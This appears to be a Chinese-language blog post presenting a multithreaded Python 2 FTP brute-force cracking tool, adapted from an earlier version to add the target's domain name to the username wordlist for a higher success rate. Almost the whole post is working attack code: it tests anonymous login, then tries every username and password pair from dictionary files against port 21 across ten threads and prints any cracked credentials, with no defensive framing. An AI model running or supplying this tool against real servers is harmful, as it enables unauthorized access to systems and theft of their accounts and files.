升级自:https://www.waitalone.cn/python-ftp-mult.html
在原基础上增加:如果用户输入的目标是域名,则将域名加入到爆破用户列表中,增加爆破成功率。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
import ftplib, socket  
import sys, time, re, os  
from functools import partial  
from multiprocessing.dummy import Pool as ThreadPool  
  
  
def usage():  
    print '+' + '-' * 50 + '+'  
    print '\t   Python FTP暴力破解工具多线程版'  
    print '\t\t Time:2014-09-05'  
    print '+' + '-' * 50 + '+'  
    if len(sys.argv) != 4:  
        print "用法: "+os.path.basename(sys.argv[0])+" 待破解的ip/domain 用户名列表 字典列表"  
        print "实例: "+os.path.basename(sys.argv[0])+" www.alin.cn user.txt pass.txt"  
        sys.exit()  
  
  
def brute_anony():  
    try:  
        print '[+] 测试匿名登陆……\n'  
        ftp = ftplib.FTP()  
        ftp.connect(host, 21, timeout=5)  
        print 'FTP消息: %s \n' % ftp.getwelcome()  
        ftp.login()  
        ftp.retrlines('LIST')  
        ftp.quit()  
        print '\n[+] 匿名登陆成功……\n'  
    except ftplib.all_errors:  
        print '\n[-] 匿名登陆失败!\n'  
  
  
def brute_users(user, pwd):  
    try:  
        ftp = ftplib.FTP()  
        ftp.connect(host, 21, timeout=2)  
        ftp.login(user, pwd)  
        ftp.quit()  
        print '\n[+] 破解成功,用户名:%s 密码:%s\n' % (user, pwd)  
    except ftplib.all_errors:  
        pass  
  
  
if __name__ == '__main__':  
    usage()  
    start_time = time.time()  
    thrdlist = []  
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):  
        host = sys.argv[1]  
    else:  
        host = socket.gethostbyname(sys.argv[1])  
        isExist = 0  
        isExist1 = 0  
        with open(sys.argv[2],'r') as tmp:  
            for line in tmp.readlines():  
                if sys.argv[1] in line:  
                    isExist = 1  
                    if isExist1 == 1:  
                        break  
                if re.sub(r'\.\w+$','',sys.argv[1]) in line:  
                    isExist1 = 1  
                    if isExist == 1:  
                        break  
        with open(sys.argv[2],"a") as f:  
            if isExist == 0:  
                f.write("\n"+sys.argv[1])  
            if isExist1 == 0:  
                f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))  
    userlist = [i.rstrip() for i in open(sys.argv[2])]  
    passlist = [j.rstrip() for j in open(sys.argv[3])]  
    print '目  标:%s \n' % sys.argv[1]  
    print '用户名:%d 条\n' % len(userlist)  
    print '密  码:%d 条\n' % len(passlist)  
    brute_anony()  
    print '\n[+] 暴力破解测试中……\n'  
    for user in userlist:  
        partial_user = partial(brute_users, user)  
        pool = ThreadPool(10)  
        pool.map(partial_user, passlist)  
        pool.close()  
        pool.join()  
    print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)

更多文章,请关注:开猿笔记